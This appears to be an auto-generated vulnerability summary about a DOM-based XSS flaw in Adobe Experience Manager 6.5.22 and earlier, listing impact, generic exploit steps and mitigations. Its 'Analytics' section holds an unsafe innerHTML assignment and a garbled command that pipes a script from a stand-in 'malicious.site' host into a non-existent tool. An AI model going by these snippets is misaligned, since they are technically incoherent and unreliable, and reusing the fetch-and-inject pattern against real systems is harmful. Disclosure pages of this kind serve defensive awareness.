Listen to this Post
How the CVE Works
CVE-2025-47049 is a DOM-based Cross-Site Scripting (XSS) vulnerability in Adobe Experience Manager (AEM) versions 6.5.22 and earlier. The flaw occurs when untrusted input is improperly sanitized before being written to the DOM, allowing attackers to inject malicious JavaScript. When a victim visits a specially crafted webpage, the attacker can manipulate DOM elements to execute arbitrary scripts in the victim’s browser session. This can lead to session hijacking, data theft, or unauthorized actions within the AEM interface. Exploitation requires user interaction, such as clicking a malicious link.
DailyCVE Form
Platform: Adobe Experience Manager
Version: ≤ 6.5.22
Vulnerability: DOM-based XSS
Severity: Critical
Date: 06/16/2025
Prediction: Patch by 07/15/2025
What Undercode Say
Analytics
document.querySelector('[vulnerable-element]').innerHTML = unescapedInput;
curl -X GET "malicious.site/payload.js" | inject_script
How Exploit
1. Craft malicious URL with XSS payload.
2. Trick user into clicking the link.
3. Execute JavaScript in AEM context.
Protection from this CVE
1. Update to AEM 6.5.23+.
2. Sanitize DOM inputs.
3. Implement CSP headers.
Impact
- Session hijacking
- Data exfiltration
- Unauthorized admin actions
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
